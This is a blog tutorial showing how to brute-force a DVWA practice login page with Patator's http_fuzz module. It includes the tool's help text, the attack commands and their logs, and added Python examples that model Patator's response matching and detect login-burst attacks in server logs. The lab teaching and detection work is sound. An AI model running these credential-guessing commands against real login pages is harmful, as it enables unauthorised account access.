
Use Patator To Brute Force DVWA login Page

Hello Friends,



Welcome again to my blog. In this post, I'm going to walk through another usage example of the Patator password-cracking tool, run against the DVWA login page as a practice exercise, so that we can learn how Patator is used.

Before starting this tutorial, I would like to share my opinion about Patator. In my view, Patator is awesome: very easy to use, smart, good, very helpful and user friendly. Want to read more or install it? Click here.

Here, for the purposes of this tutorial, I am using DVWA (Damn Vulnerable Web Application). For more info:

How To Setup DVWA in VirtualBox
Setup DVWA in Windows




So, let's start with a quick setup of DVWA.

Now, create a folder and open your terminal in that folder.

Patator Help Main Menu

$ patator.py http-fuzz
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + rdp_gateway   : Brute-force RDP Gateway
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

Patator Http_Fuzz Module Help Manual

$ patator.py http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz  [global-options ...]

Examples:
  http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
  http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
  http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
  url           : target url (scheme://host[:port]/path?query)
  body          : body data
  header        : use custom headers
  method        : method to use [GET|POST|HEAD|...]
  raw_request   : load request from file
  scheme        : scheme [http|https]
  auto_urlencode: automatically perform URL-encoding [1|0]
  user_pass     : username and password for HTTP authentication (user:pass)
  auth_type     : type of HTTP authentication [basic | digest | ntlm]
  follow        : follow any Location redirect [0|1]
  max_follow    : redirection limit [5]
  accept_cookie : save received cookies to issue them in future requests [0|1]
  proxy         : proxy to use (host:port)
  proxy_type    : proxy type [http|socks4|socks4a|socks5]
  resolve       : hostname to IP address resolution to use (hostname:IP)
  ssl_cert      : client SSL certificate file (cert+key in PEM format)
  timeout_tcp   : seconds to wait for a TCP handshake [10]
  timeout       : seconds to wait for a HTTP response [20]
  before_urls   : comma-separated URLs to query before the main request
  before_header : use a custom header in the before_urls request
  before_egrep  : extract data from the before_urls response to place in the main request
  after_urls    : comma-separated URLs to query after the main request
  max_mem       : store no more than N bytes of request+response data in memory [-1 (unlimited)]
  persistent    : use persistent connections [1|0] 

Global options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Execution:
    -x arg              actions and conditions, see Syntax below
    --start=N           start from offset N in the wordlist product
    --stop=N            stop at offset N
    --resume=r1[,rN]*   resume previous run
    -e arg              encode everything between two tags, see Syntax below
    -C str              delimiter string in combo files (default is ':')
    -X str              delimiter string in conditions (default is ',')
    --allow-ignore-failures
                        failures cannot be ignored with -x (this is by design
                        to avoid false negatives) this option overrides this
                        behavior

  Optimization:
    --rate-limit=N      wait N seconds between each test (default is 0)
    --timeout=N         wait N seconds for a response before retrying payload
                        (default is 0)
    --max-retries=N     skip payload after N retries (default is 4) (-1 for
                        unlimited)
    -t N, --threads=N   number of threads (default is 10)

  Logging:
    -l DIR              save output and response data into DIR
    -L SFX              automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                        (DIR defaults to '/tmp/patator')

  Debugging:
    -d, --debug         enable debug messages

Syntax:
 -x actions:conditions

    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

    ignore      : do not report
    retry       : try payload again
    free        : dismiss future similar payloads
    quit        : terminate execution now
    reset       : close current connection in order to reconnect next time

    code        : match status code
    size        : match size (N or N-M or N- or -N)
    time        : match time (N or N-M or N- or -N)
    mesg        : match message
    fgrep       : search for string in mesg
    egrep       : search for regex in mesg
    clen        : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

 -e tag:encoding

    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "unhex" | "sha1" | "b64" | "url" | "hex" | "md5"

    unhex       : decode from hexadecimal
    sha1        : hash in sha1
    b64         : encode in base64
    url         : url encode
    hex         : encode in hexadecimal
    md5         : hash in md5

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.


So, let's start with a demo request:


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301

Please read the http_fuzz module manual provided above to understand the meaning of the parameters.
I sent that request just to understand how Patator's parameters work.
Then I followed the steps below to make things clearer.

$ mkdir logs 
$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301 -l ./logs 
$ cat logs/RUNTIME.log 
$ http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body=username=admin&password=password&Login=Login# 0=../files/pass_filter -x quit:code=301 -l ./logs
00:33:47 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:33 IST
00:33:47 patator    INFO -                                                                              
00:33:47 patator    INFO - code size:clen       time | candidate                          |   num | mesg
00:33:47 patator    INFO - -----------------------------------------------------------------------------
00:33:47 patator    INFO - 302  501:0          0.006 |                                    |     1 | HTTP/1.1 302 Found
00:33:48 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s 
$ cat logs/RESULTS.csv 
time,level,code,size:clen,time,candidate,num,mesg
00:33:47,INFO,302,501:0,0.006,"",1,"HTTP/1.1 302 Found" 


Raw Request And Response Record

$ cat logs/1_302-501\:0-0.006.txt 
POST /login.php HTTP/1.1
Host: 192.168.43.131
User-Agent: Mozilla/5.0
Accept: */*
Content-Length: 47
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login%23

HTTP/1.1 302 Found
Date: Wed, 09 Jan 2019 19:03:01 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=falpigu76cuj0o3v0vmv3uu6f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: index.php
Content-Length: 0
Content-Type: text/html 
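To make the tuning step concrete, here is an added example (not part of the original post and not Patator's own code) that models how the `-x actions:conditions` syntax from the help text above is evaluated against this captured exchange: a `code=301` condition never fires on this 302 response, whereas `fgrep='Location: index.php'` does, because in http_fuzz the fgrep/egrep search covers the raw response, headers included, which is exactly what the tuned command on this page relies on. The embedded exchange is a trimmed copy of the page's capture, so the `size` check counts the trimmed text rather than reproducing the 501 in the log.

```python
import re

# Trimmed copy of the exchange patator saved under logs/ above
# (request, blank line, response), kept to the headers the conditions look at.
CAPTURED = """POST /login.php HTTP/1.1
Host: 192.168.43.131

username=admin&password=password&Login=Login%23

HTTP/1.1 302 Found
Set-Cookie: security=high
Location: index.php
Content-Length: 0
"""

def split_exchange(text):
    """Split a saved http_fuzz exchange into (request, response)."""
    idx = text.index("\nHTTP/1.")            # first line of the response
    return text[:idx].strip(), text[idx:].strip()

def in_range(value, spec):
    """Numeric spec as in the Syntax section: N, N-M, N- or -N."""
    lo, sep, hi = spec.partition("-")
    if not sep:
        return value == int(lo)
    return (not lo or value >= int(lo)) and (not hi or value <= int(hi))

def condition_matches(response, cond):
    """Evaluate one condition=value pair against the raw response text."""
    name, _, val = cond.partition("=")
    val = val.strip("'\"")                   # shell quoting already removed
    if name == "code":
        return in_range(int(response.split(None, 2)[1]), val)
    if name == "size":                       # headers + body, like the size column
        return in_range(len(response), val)
    if name == "clen":
        m = re.search(r"^Content-Length:\s*(\d+)", response, re.M | re.I)
        return in_range(int(m.group(1)) if m else -1, val)
    if name == "fgrep":                      # headers are searched too
        return val in response
    if name == "egrep":
        return re.search(val, response, re.M) is not None
    raise ValueError("unsupported condition: " + name)

def actions_for(response, expr):
    """'actions:conditions' (the -x argument) -> actions if all conditions hold."""
    actions, _, conds = expr.partition(":")
    if all(condition_matches(response, c) for c in conds.split(",")):
        return actions.split(",")
    return []
```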

Well, after examining the request Patator generated and the server's response, here is my fine-tuned command
and its output:


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=FILE0&Login=Login#' 0=../files/pass_filter -x quit:fgrep='Location: index.php'
00:44:27 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:44 IST
00:44:27 patator    INFO -                                                                              
00:44:27 patator    INFO - code size:clen       time | candidate                          |   num | mesg
00:44:27 patator    INFO - -----------------------------------------------------------------------------
00:44:27 patator    INFO - 302  501:0          0.027 | password                           |     1 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.012 | passw0rd                           |     2 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.027 | passcode                           |    12 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.012 | passport                           |     3 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.005 | passions                           |     4 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.019 | passion1                           |     5 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.009 | pass1234                           |     6 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.024 | passward                           |    11 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.029 | passwoed                           |    22 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.041 | passion2                           |    13 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.033 | passion7                           |    14 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.024 | passwrod                           |    15 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.028 | passion8                           |    16 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.021 | passwort                           |     7 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.013 | passwerd                           |     8 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.015 | passowrd                           |     9 | HTTP/1.1 302 Found
00:44:27 patator    INFO - Hits/Done/Skip/Fail/Size: 16/16/0/0/1055, Avg: 79 r/s, Time: 0h 0m 0s
00:44:27 patator    INFO - To resume execution, pass --resume 2,3,2,2,2,2,1,1,1,0
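From the defender's side, a run like the one above leaves an obvious trace in the web server's access log: a burst of POST /login.php requests from one source at tens of requests per second, each answered with a 302 and an empty body, sent with the bare "Mozilla/5.0" User-Agent visible in the captured request. The following added example (not from the original post and not part of Patator) flags such bursts in Apache combined-format log lines; the log lines are constructed for the demonstration, and the threshold and window values are arbitrary assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines (not taken from the page's server),
# shaped like what the DVWA host would record: a burst of POSTs to /login.php
# from one source, each answered 302 with an empty body, next to normal traffic.
ATTACK = '192.168.43.1 - - [10/Jan/2019:00:44:27 +0530] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
LOG_LINES = [ATTACK] * 8 + [
    '192.168.43.50 - - [10/Jan/2019:00:45:00 +0530] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/64.0"',
    '192.168.43.50 - - [10/Jan/2019:00:45:30 +0530] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/64.0"',
    '192.168.43.50 - - [10/Jan/2019:00:45:31 +0530] "GET /index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/64.0"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def parse_line(line):
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, ua = m.groups()
    return {"ip": ip, "t": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status), "ua": ua}

def find_login_bursts(lines, path="/login.php", threshold=5, window_s=10):
    """Sources that POST to `path` at least `threshold` times inside any
    `window_s`-second sliding window -> {ip: total POSTs to path}."""
    by_ip = defaultdict(list)
    for line in lines:
        r = parse_line(line)
        if r and r["method"] == "POST" and r["path"] == path:
            by_ip[r["ip"]].append(r["t"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_s:
                start += 1                   # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged

if __name__ == "__main__":
    for ip, n in find_login_bursts(LOG_LINES).items():
        print(f"{ip}: {n} POST {'/login.php'} requests, burst threshold exceeded")
```

A real deployment would pair this with a per-account failed-login counter and a lockout or delay on the login handler itself, since source-IP bursts are easy to spread across addresses.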



I hope this data-heavy post was helpful for understanding how Patator works.
To be honest, while using Patator I felt it still needs big improvements.

